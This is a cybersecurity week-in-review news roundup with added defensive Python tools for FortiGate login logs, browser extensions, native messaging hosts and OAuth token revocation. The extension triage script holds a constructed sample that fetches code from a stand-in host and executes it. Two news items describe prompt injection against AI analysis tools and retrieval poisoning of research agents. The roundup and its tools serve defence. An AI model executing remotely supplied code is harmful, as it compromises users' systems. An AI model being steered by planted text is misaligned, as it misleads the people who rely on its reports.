Cyber Security Week in Review: June 26, 2026

Mandiant has shared new details about how hackers exploited a Cisco Catalyst SD-WAN vulnerability, tracked as CVE-2026-20245, in zero-day attacks. The high-severity flaw allowed attackers with access to affected devices to run commands as root by uploading a specially crafted file.

Another critical Cisco vulnerability (CVE-2026-20230) has also been reported as actively exploited. The flaw impacts Cisco Unified Communications Manager Server. Cisco issued security patches for the vulnerability on June 3, 2026, warning that successful exploitation could allow attackers to gain root-level privileges on affected systems.

The US Cybersecurity and Infrastructure Security Agency (CISA) has warned that attackers are actively exploiting a vulnerability (CVE-2025-67038) in Lantronix EDS5000 devices that could allow the execution of arbitrary commands with elevated privileges. The updated Known Exploited Vulnerabilities (KEV) catalog also includes three vulnerabilities in Ubiquiti UniFi OS (CVE-2026-34908, CVE-2026-34909, and CVE-2026-34910) that could enable unauthorized system changes, access to sensitive files, and remote code execution, potentially leading to full system compromise. Ubiquiti had released fixes for the flaws in May 2026.

Security company SOCRadar reports that a large-scale campaign dubbed FortiBleed, which targets Fortinet FortiGate firewalls to steal authentication credentials from organizations worldwide, used custom sniffers to collect data. The campaign has been active since at least February 2026 and has targeted more than 430,000 FortiGate devices. Researchers believe the attackers operate as an initial access broker (IAB), obtaining access to networks through credential stuffing, brute-force attacks, and password cracking.
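Credential stuffing and brute-force attempts against a firewall's admin or VPN login leave a recognisable shape in the device's own event log: one source address, many failures, either against one account or across many. The detector below is an added example, not code from SOCRadar or Fortinet. It parses FortiGate-style space-separated key="value" event lines; the sample lines are constructed to that shape (the exact keys in a real log depend on FortiOS version and login type, so check them against your own export), and the thresholds are illustrative.

```python
"""Spot brute-force and password-spray patterns in FortiGate login events.

Added example, not vendor code. Input lines are FortiGate-style key=value
event records; SAMPLE_LOG is constructed for illustration.
"""
import re
from collections import defaultdict

# Matches key=value and key="value with spaces" pairs.
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse(line: str) -> dict:
    """Turn one key=value event line into a dict (quotes stripped)."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def is_failed_login(ev: dict) -> bool:
    # Admin GUI/SSH logins: action="login" status="failed".
    # SSL VPN logins: action="ssl-login-fail".
    if ev.get("action") == "ssl-login-fail":
        return True
    return ev.get("action") == "login" and ev.get("status") == "failed"


def detect(lines, min_failures=5, min_users=3):
    """Return sorted (kind, source_ip, distinct_users, total_failures) alerts.

    'spray'       : one source failing against >= min_users accounts
    'brute-force' : one source failing >= min_failures times on fewer accounts
    """
    per_ip = defaultdict(lambda: defaultdict(int))  # ip -> user -> failures
    for line in lines:
        ev = parse(line)
        if not is_failed_login(ev):
            continue
        ip = ev.get("srcip") or ev.get("remip") or "?"  # admin vs VPN field
        per_ip[ip][ev.get("user", "?")] += 1
    alerts = []
    for ip, users in per_ip.items():
        total = sum(users.values())
        if len(users) >= min_users:
            alerts.append(("spray", ip, len(users), total))
        elif total >= min_failures:
            alerts.append(("brute-force", ip, len(users), total))
    return sorted(alerts)


# Constructed sample: five admin failures from one IP, three VPN failures across
# three users from another, one success and one lone failure as background noise.
ADMIN_FAIL = ('date=2026-06-20 time=09:00:%02d devname="FGT-EDGE" logid="0100032002" '
              'type="event" subtype="system" level="alert" logdesc="Admin login failed" '
              'user="admin" ui="https(203.0.113.5)" srcip=203.0.113.5 action="login" '
              'status="failed" reason="passwd_invalid"')
VPN_FAIL = ('date=2026-06-20 time=09:01:%02d devname="FGT-EDGE" logid="0101039426" '
            'type="event" subtype="vpn" level="alert" logdesc="SSL VPN login fail" '
            'action="ssl-login-fail" remip=198.51.100.9 user="%s" reason="sslvpn_login_permission_denied"')
SAMPLE_LOG = [ADMIN_FAIL % s for s in range(5)]
SAMPLE_LOG += [VPN_FAIL % (i, u) for i, u in enumerate(["alice", "bob", "carol"])]
SAMPLE_LOG += [
    'date=2026-06-20 time=09:02:00 devname="FGT-EDGE" logid="0100032001" type="event" '
    'subtype="system" user="ops" srcip=192.0.2.1 action="login" status="success"',
    'date=2026-06-20 time=09:02:30 devname="FGT-EDGE" logid="0100032002" type="event" '
    'subtype="system" user="ops" srcip=192.0.2.8 action="login" status="failed" reason="passwd_invalid"',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Run it against a syslog export with `detect(open("fortigate.log"))`; tune `min_failures` and `min_users` to the window you aggregate over, and treat any source that trips the spray rule as a candidate for blocking at the edge.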

Microsoft's threat intelligence team has detailed a sophisticated intrusion campaign linked to a ransomware group tracked as Storm-2603, which targeted on-premises SharePoint servers throughout mid-2025. The attackers exploited known SharePoint vulnerabilities (CVE-2025-49706 and CVE-2025-49704) and conducted reconnaissance for additional access paths.

In a separate report, Microsoft has linked a recent supply chain attack targeting the Mastra AI ecosystem to the North Korean hacking group tracked as Sapphire Sleet (also known as BlueNoroff). Sapphire Sleet is a North Korean state-sponsored threat actor known for cryptocurrency theft, fake job scams, malicious browser extensions, and software supply chain attacks. Microsoft also linked the group to a separate npm supply chain attack targeting the Axios HTTP client in April 2026.

A previously undocumented malware botnet called AryStinger has infected more than 4,000 outdated routers worldwide. The malware turns compromised devices into remote-controlled systems that can be used for scanning networks, relaying malicious traffic, and carrying out attacks. AryStinger mainly targets older D-Link router models, including the DIR-850L and DIR-818LW, by exploiting known security flaws (CVE-2013-3307, CVE-2016-5681, and CVE-2025-11837).

A sophisticated malware known as ‘Showboat’ has been targeting telecom companies across the Middle East since 2022. Showboat collects system information, running processes, and screenshots from infected devices. Researchers believe that the malware is the work of China-affiliated threat actors.

SentinelLABS analyzed a Rust-based macOS malware implant called ‘macOS.Gaslight’ that includes a large prompt-injection payload designed to mislead AI-assisted security analysis tools and potentially cause them to stop or disrupt the analysis. The malware communicates with its operators through the Telegram Bot API using encrypted, certificate-pinned connections and hides its own Telegram bot token from logs and crash reports. Researchers assess with high confidence that macOS.Gaslight is linked to a broader cluster of DPRK-aligned macOS malware activity.

A threat actor is conducting a targeted malware campaign against Thailand’s healthcare sector, with attacks aimed at Ministry of Health officials, hospital administrators, clinic staff, and medical procurement teams. The campaign uses healthcare-themed spear-phishing emails that contain malicious RAR archives disguised as legitimate documents.

A Chrome extension called ‘Adblock for YouTube,’ which has over 10 million installs, has been found to contain a hidden capability that could allow it to run arbitrary JavaScript code on websites. The extension currently works as advertised by blocking YouTube ads, and researchers found no evidence of malicious activity. However, they warned that a server-side configuration change could potentially activate this code-execution feature without requiring an extension update or Chrome Web Store review.
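The pattern described above, a dormant code path that a server-side switch can activate, is visible in the extension's package before any switch is flipped: a dynamic-code sink (`eval`, `new Function`, string timers, `executeScript({code})`) in a script that also fetches data from a remote server. The triage script below is an added example, not the researchers' tooling or the extension's code. Its regex heuristics and the sample extension (a hypothetical ad blocker, not the one named above) are constructed for illustration; `load_unpacked()` runs the same checks on any unpacked extension directory.

```python
"""Static triage of an unpacked Chrome/Edge extension for a remotely
activatable code-execution path. Added example; heuristics and sample are constructed.
"""
import json
import os
import re

# Host patterns that grant access to every site the user visits.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Sinks that turn a string into running code. Any of these fed by data
# fetched from a server is the "server-side switch" pattern.
DYNAMIC_SINKS = [
    (r"\beval\s*\(", "eval()"),
    (r"\bnew\s+Function\s*\(", "new Function()"),
    (r"\bset(?:Timeout|Interval)\s*\(\s*['\"`]", "setTimeout/setInterval(string)"),
    (r"\.executeScript\s*\(\s*\{[^}]*\bcode\s*:", "executeScript({code})"),
]
# A fetch/XHR whose target is an absolute http(s) URL, i.e. not bundled data.
REMOTE_FETCH = re.compile(r"\b(?:fetch|XMLHttpRequest)\b[^;]*https?://")


def triage(manifest: dict, scripts: dict) -> list:
    """Return findings for a manifest dict plus {filename: javascript source}."""
    findings = []
    perms = set(manifest.get("permissions", []))
    hosts = set(manifest.get("host_permissions", [])) | perms  # MV2 put hosts in permissions
    if hosts & BROAD_HOSTS:
        findings.append("broad host permissions: %s" % sorted(hosts & BROAD_HOSTS))
    for perm, why in (("scripting", "can inject into pages"),
                      ("nativeMessaging", "can talk to local host binaries")):
        if perm in perms:
            findings.append("permission '%s' (%s)" % (perm, why))
    for name, js in scripts.items():
        remote = REMOTE_FETCH.search(js) is not None
        for pattern, label in DYNAMIC_SINKS:
            if re.search(pattern, js):
                sev = "HIGH" if remote else "MEDIUM"
                suffix = " and fetches remote data" if remote else ""
                findings.append("%s: %s uses %s%s" % (sev, name, label, suffix))
    return findings


def load_unpacked(directory: str):
    """Read manifest.json and every .js file below an unpacked extension dir."""
    with open(os.path.join(directory, "manifest.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)
    scripts = {}
    for root, _, files in os.walk(directory):
        for f in files:
            if f.endswith(".js"):
                path = os.path.join(root, f)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    scripts[os.path.relpath(path, directory)] = fh.read()
    return manifest, scripts


# Constructed sample (hypothetical extension): the service worker polls a config
# URL and executes whatever the server puts in the "extra" field.
SAMPLE_MANIFEST = {
    "manifest_version": 3,
    "name": "Sample Ad Blocker",
    "permissions": ["scripting", "storage"],
    "host_permissions": ["<all_urls>"],
}
SAMPLE_SCRIPTS = {
    "background.js": """
      async function sync() {
        const r = await fetch("https://config.example.invalid/rules.json");
        const cfg = await r.json();
        if (cfg.extra) { new Function(cfg.extra)(); }   // remotely supplied code
      }
      setInterval(sync, 3600000);
    """,
    "content.js": "document.querySelectorAll('.ad').forEach(e => e.remove());",
}

if __name__ == "__main__":
    for line in triage(SAMPLE_MANIFEST, SAMPLE_SCRIPTS):
        print(line)
```

A HIGH finding does not prove malice (legitimate extensions occasionally ship such code), but it identifies exactly the extensions where a store review of the current bundle says nothing about tomorrow's behaviour.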

A new malware campaign linked to an initial access broker associated with Payouts King ransomware is using a malicious Microsoft Edge browser extension, dubbed ‘Edgecution,’ to gain access to victim systems. The malware abuses the Chrome native messaging protocol, a feature supported by Chromium-based browsers that allows browser extensions to exchange messages with a local application registered as a native messaging host. Because the host runs as an ordinary process outside the browser sandbox, an extension paired with a malicious host gains direct access to the host operating system without needing a browser exploit.
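Because a native messaging host is an ordinary executable that the browser launches outside its sandbox, the registration manifests are the place to hunt for this technique: each manifest names the binary and the extension IDs allowed to talk to it. The auditor below is an added example, not code from the researchers or from any browser vendor. The manifest directories are the documented Chrome and Edge defaults for Linux and macOS (on Windows the manifests are registered under `HKCU`/`HKLM\Software\Google\Chrome\NativeMessagingHosts` and the Edge equivalent instead, so point `audit()` at those files manually); the sample manifests and the risk heuristics are constructed.

```python
"""Audit native messaging host manifests registered with Chromium browsers.

Added example, not vendor code. Manifest directories are Chrome/Edge documented
defaults for Linux and macOS; samples and heuristics are constructed.
"""
import glob
import json
import os
import re

MANIFEST_DIRS = [
    "~/.config/google-chrome/NativeMessagingHosts",
    "~/.config/microsoft-edge/NativeMessagingHosts",
    "/etc/opt/chrome/native-messaging-hosts",
    "/etc/opt/edge/native-messaging-hosts",
    "~/Library/Application Support/Google/Chrome/NativeMessagingHosts",
    "~/Library/Application Support/Microsoft Edge/NativeMessagingHosts",
    "/Library/Google/Chrome/NativeMessagingHosts",
    "/Library/Microsoft/Edge/NativeMessagingHosts",
]
# Chrome extension IDs are 32 characters drawn from a-p.
ORIGIN_RE = re.compile(r"^chrome-extension://[a-p]{32}/$")
SCRIPT_EXT = (".py", ".ps1", ".bat", ".cmd", ".sh", ".vbs", ".js", ".hta")
INTERPRETERS = {"python", "python3", "pwsh", "powershell.exe", "cmd.exe", "bash",
                "sh", "node", "wscript.exe", "cscript.exe", "mshta.exe"}
# Path fragments (after normalising separators) that mean anyone could drop the host there.
USER_WRITABLE = ("/tmp/", "/downloads/", "/users/public/", "/appdata/local/temp/")


def audit(manifest: dict, manifest_file: str = "") -> list:
    """Return findings for one parsed host manifest (empty list = nothing odd)."""
    findings = []
    name = manifest.get("name", "")
    path = manifest.get("path", "")
    norm = path.replace("\\", "/").lower()
    if manifest.get("type") != "stdio":
        findings.append("type is %r, Chrome only accepts 'stdio'" % manifest.get("type"))
    if manifest_file and os.path.basename(manifest_file) != name + ".json":
        findings.append("file name does not match host name %r" % name)
    base = os.path.basename(norm)
    if base in INTERPRETERS or base.endswith(SCRIPT_EXT):
        findings.append("HIGH: host is a script or interpreter: %s" % path)
    if any(marker in norm for marker in USER_WRITABLE):
        findings.append("HIGH: host lives in a user-writable location: %s" % path)
    origins = manifest.get("allowed_origins", [])
    bad = [o for o in origins if not ORIGIN_RE.match(o)]
    if bad:
        findings.append("malformed allowed_origins: %s" % bad)
    if len(origins) > 3:
        findings.append("%d extensions may call this host" % len(origins))
    return findings


def scan_system() -> dict:
    """Audit every manifest found in the default directories; {file: findings}."""
    report = {}
    for d in MANIFEST_DIRS:
        for f in glob.glob(os.path.join(os.path.expanduser(d), "*.json")):
            try:
                with open(f, encoding="utf-8") as fh:
                    manifest = json.load(fh)
            except (OSError, ValueError) as exc:
                report[f] = ["unreadable: %s" % exc]
                continue
            report[f] = audit(manifest, f)
    return report


# Constructed samples: a vendor bridge installed system-wide, and a host that is
# a Python script sitting in /tmp with one malformed origin entry.
BENIGN = {"name": "com.vendor.bridge", "description": "Vendor bridge",
          "path": "/opt/vendor/bridge", "type": "stdio",
          "allowed_origins": ["chrome-extension://abcdefghijklmnopabcdefghijklmnop/"]}
SUSPECT = {"name": "com.update.helper", "description": "Update helper",
           "path": "/tmp/.edge_helper/host.py", "type": "stdio",
           "allowed_origins": ["chrome-extension://ponmlkjihgfedcbaponmlkjihgfedcba/",
                               "chrome-extension://bad-id/"]}

if __name__ == "__main__":
    for label, m in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, audit(m))
    for f, findings in scan_system().items():
        print(f, findings or "ok")
```

Anything flagged HIGH deserves a look at the binary itself and at which extension ID owns the allowed origin; a host that a single unlisted extension installed alongside itself is the pairing the passage above describes.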

A novel backdoor called ‘Mistic’ has been observed in financially motivated intrusions against organizations in sectors like insurance, education, IT, and professional services. Researchers believe it is connected to KongTuke/Woodgnat, a group that breaks into company networks and sells access to ransomware groups.

Netcraft warns that the Bluekit phishing-as-a-service platform is expanding, with nearly 70 new hostnames discovered in the past week. It now uses a browser-in-the-middle (BitM) technique, which lets attackers control a browser session that displays the real login page to victims. By using the rrweb JavaScript library, attackers can capture and stream user activity, making it easier to steal login credentials and other sensitive information.

Multiple enterprises have had their Salesforce accounts compromised in a hacking campaign linked to business intelligence platform Klue. The vendor said that attackers gained access to its systems on June 12 through a compromised legacy credential connected to an integration service.

The hackers then stole OAuth tokens used by customers to connect Klue with third-party platforms, including Salesforce. Using the stolen tokens, the attackers accessed customer Salesforce accounts and downloaded data. A new hacking group known as Icarus has claimed responsibility for the attack on its dark web leak site.

LastPass has also confirmed that hackers accessed customer data after stealing OAuth tokens during a cyberattack on Klue. LastPass said its products, services, infrastructure, and customer password vaults were not affected. The company also found no evidence that customer calls or emails stored in Gong were accessed. The exposed data may include customer names, phone numbers, email addresses, physical addresses, support case details, and sales-related information.
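When a vendor that holds delegated access is breached, the containment step on the customer side is to revoke every OAuth token that vendor was issued, refresh tokens first, since a stolen refresh token can mint new access tokens after the old ones expire. The script below is an added example, not code from the article, Klue, Salesforce or LastPass. It implements the token revocation request standardised in RFC 7009 (a form-encoded POST of `token` and `token_type_hint` to the provider's revocation endpoint); `SALESFORCE_REVOKE` is Salesforce's documented `/services/oauth2/revoke` path, and the token inventory plus the offline transport are constructed so the example runs without network access.

```python
"""Bulk-revoke OAuth tokens issued to a compromised third-party integration.

Added example implementing RFC 7009 token revocation. The inventory and the
offline transport are constructed; send_live() is the real transport.
"""
import urllib.error
import urllib.parse
import urllib.request

# Salesforce's documented revocation endpoint (use your My Domain host if applicable).
SALESFORCE_REVOKE = "https://login.salesforce.com/services/oauth2/revoke"


def build_revocation(endpoint: str, token: str, hint: str) -> urllib.request.Request:
    """RFC 7009: POST token=...&token_type_hint=... as a form body."""
    body = urllib.parse.urlencode({"token": token, "token_type_hint": hint}).encode()
    return urllib.request.Request(
        endpoint, data=body, method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"})


def send_live(req: urllib.request.Request) -> int:
    """Real transport. Per RFC 7009 a 200 means revoked (or already invalid)."""
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        return exc.code


def revoke_integration(inventory, integration, endpoint, send=send_live):
    """Revoke every token the inventory attributes to `integration`.

    Refresh tokens go first: an attacker holding one can mint fresh access
    tokens, so killing only access tokens buys nothing. Returns
    {token_id: http_status} in the order the revocations were attempted.
    """
    targets = [t for t in inventory if t["integration"] == integration]
    targets.sort(key=lambda t: 0 if t["kind"] == "refresh_token" else 1)
    results = {}
    for t in targets:
        results[t["id"]] = send(build_revocation(endpoint, t["token"], t["kind"]))
    return results


def send_offline(log: list):
    """Constructed transport for dry runs: records each request, answers 200."""
    def send(req):
        log.append((req.full_url, urllib.parse.parse_qs(req.data.decode())))
        return 200
    return send


# Constructed inventory (hypothetical integration names and token strings), as
# exported from the identity provider's connected-app token listing.
INVENTORY = [
    {"id": "tok-1", "integration": "bi-platform-sync", "kind": "access_token", "token": "ACCESS-A1"},
    {"id": "tok-2", "integration": "bi-platform-sync", "kind": "refresh_token", "token": "REFRESH-R1"},
    {"id": "tok-3", "integration": "hr-connector", "kind": "refresh_token", "token": "REFRESH-R2"},
]

if __name__ == "__main__":
    seen = []
    print(revoke_integration(INVENTORY, "bi-platform-sync", SALESFORCE_REVOKE, send=send_offline(seen)))
    for url, form in seen:
        print(url, form)
```

Revocation only closes the tokens you know about; the credential the attacker used to get into the vendor in the first place must be rotated too, or the integration can simply be re-authorised, and the provider's connected-app login history should be reviewed for the window in which the tokens were live.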

More than one-third of Samsung and LG smart TVs contain software that can turn the devices into proxy nodes. Researchers found the proxy code embedded within low-utility applications such as clock widgets, screensavers, games, and similar apps. Many of the applications rely on consent language buried in their terms of service, allowing them to claim user authorization for this functionality.

Researchers at Cornell Tech have discovered a new method for manipulating AI-powered deep-research systems, which doesn’t require access to search engine infrastructure or model internal components. The attack, called ‘Web Agent Retrieval Poisoning’ (WARP), targets AI research agents that gather information from the internet and create detailed reports. According to the researchers, a single Reddit comment containing as few as 13 carefully chosen words can influence what some AI systems include in their final reports.

An international law enforcement operation has disrupted the SocGholish malware network, linked to the Russia-based cybercrime group Evil Corp. Authorities seized over 100 servers and cleaned nearly 15,000 infected websites used to spread malware. The operation also disrupted two other malware strains, StealC and Amadey. Separately, Canada's intelligence agency was authorized to access and disconnect infected devices and servers from foreign-operated botnets, though it is unclear whether this was connected to the SocGholish takedown.

Authorities have disrupted a major sports piracy network connected to PirloTV, targeting 44 domains that received over 950 million visits annually. PirloTV provided links to unauthorized live sports streams, mainly soccer matches, by embedding broadcasts from licensed networks. Although it did not host the streams itself, the platform was known for quickly moving to new domains whenever authorities shut down its websites.

Polish police, with support from the FBI and HSI, arrested four members of an organized crime group involved in cyberattacks, cryptocurrency theft, and large-scale money laundering. The suspects used hacking techniques and SIM-swapping attacks to gain access to victims' accounts and steal digital assets. The stolen funds, worth tens of millions of zlotys, were laundered through bank accounts, payment platforms, and digital wallets. All four suspects have been charged and placed in pre-trial detention, facing up to 25 years in prison.

A 21-year-old American, Nathan Austad (aka “Snoopy”), was sentenced to 18 months in prison for helping hack about 60,000 DraftKings accounts in a 2022 cyberattack. The attackers used stolen or reused passwords to access accounts, stealing around $600,000 from about 1,600 users. Austad admitted selling access to hacked accounts and was also ordered to pay over $1.3 million in restitution and nearly $464,000 in forfeiture. Other people involved in the scheme, including Joseph Garrison and Kamerin Stokes, have also received prison sentences.

The US Justice Department seized a cloud computing account used by subsidiaries of Cambodia-based Huione Group. Authorities allege the subsidiaries helped criminals move and launder money from cryptocurrency scams, cybercrime, and other illegal activities. The account supported Huione Guarantee (also known as Haowang Guarantee), which allegedly operated Telegram channels offering illicit services such as stolen data sales, money laundering assistance, and support for human trafficking schemes. Prosecutors say the platform helped criminals transfer large amounts of money stolen through scams run by Southeast Asian crime networks.

Two young men, Thalha Jubair and Owen Flowers, allegedly linked to the Scattered Spider cybercrime group have pleaded guilty to attacks connected to a major hack on Transport for London (TfL). The attack caused months of disruption and cost TfL about £39 million. Flowers also admitted trying to hack US healthcare organizations.

Abdellah Belmili, 26, an Algerian national, has been arrested and extradited to the United States to face federal charges related to operating the Market0Day platform. Belmili, aka “Dila Belmili” and “SPOX,” has been charged by criminal complaint with conspiracy to commit bank fraud, an offense carrying a maximum penalty of 30 years in prison. Market0Day sold illicit goods and services, including stolen banking credentials, compromised credit card information, malware tools, and victim login data.
